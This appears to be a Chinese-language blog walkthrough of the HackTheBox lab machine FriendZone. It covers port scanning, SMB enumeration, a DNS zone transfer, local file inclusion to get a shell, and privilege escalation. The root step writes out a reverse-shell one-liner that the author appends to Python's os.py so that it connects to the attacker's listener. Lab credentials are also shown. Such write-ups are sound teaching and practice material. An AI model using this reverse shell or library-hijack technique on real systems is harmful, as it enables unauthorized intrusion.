HackTheBox::FriendZone

0x00 信息收集

nmap -Pn -p- -T4 --min-rate=1000 10.10.10.123
image.png
nmap -Pn -sCV -p 21,22,53,80,139,443,445 10.10.10.123
image.png
image.png
根据证书提示,将frienzone.red添加到hosts文件中,经过访问未发现可以利用的信息。
image.png
image.png
查看smb服务,发现可访问的目录
image.png
在general目录下发现文件cred.txt,Files目录无法访问,Development目录打开后是空文件。
image.png
打开后发现一组账号密码 admin:WORKWORKHhallelujah@#
image.png
该靶机还开放了53端口,进行DNS枚举查找是否有其他子域名可以利用到该组账号和密码。
https://www.cnblogs.com/ginvip/p/6365605.html

# 用 dig 查看 zone 数据传输
dig @server xxx.com AXFR

image.png
将新发现的几个域名添加到hosts文件中,打开后发现登陆页面和一个文件上传页面。
image.png
image.png

0x01 漏洞利用

使用得到的账号密码可以成功登录后台
image.png
尝试在上传页面上传jpg文件和php文件,均返回如下信息,无法得到文件上传路径和文件名称
image.png
image.png
经过尝试发现参数pagename有本地文件包含漏洞,结合smb里发现的Development目录可以上传文件,进行本地文件包含
image.png
上传shell到Development目录下,并执行本地文件包含,成功得到shell
image.png
image.png
python -c ‘import pty; pty.spawn(“/bin/bash”)’
使用www-data用户成功读取user.txt文件

0x02 权限提升

使用pspy查看进程发现report.py每隔2分中共执行一次
image.png
查看该python文件,发现使用了os库
image.png
上传linpeas.sh文件至靶机进行枚举
image.png
发现了os库的路径,因此可以劫持os库来进行提权,比较类似于靶机Admirer
image.png

echo "system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.10 4433 >/tmp/f')" >> /usr/lib/python2.7/os.py

image.png
image.png

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值